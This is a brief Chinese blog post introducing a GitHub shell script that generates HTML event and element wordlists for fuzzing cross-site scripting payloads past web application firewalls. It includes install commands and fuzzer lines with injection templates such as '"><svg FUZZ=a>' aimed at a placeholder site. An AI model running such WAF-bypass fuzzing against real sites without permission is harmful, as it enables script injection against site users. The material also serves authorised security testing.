XSS Bypass Waf 自动化工具

2022-04-02 11:09:03 浏览数 (2)

安装 :

代码语言:javascript复制
wget https://raw.githubusercontent.com/Ph33rr/Tools-Tips/main/xss/wordxss.sh
chmod 755 wordxss.sh
./wordxss.sh -h
代码语言:javascript复制
使用:
代码语言:javascript复制
./wordxss.sh -m > events.txt
./wordxss.sh -m | anytool
代码语言:javascript复制
fuzz -w events.txt -u 'https://www.example.com/"><svg FUZZ=a>' -fc 403 -c
代码语言:javascript复制
fuzz -w elemnts.txt -u 'https://www.example.com/"><FUZZ onerror=a>' -fc 403 -c

项目地址:

https://github.com/Ph33rr/Tools-Tips/tree/main/xss

xss

0 人点赞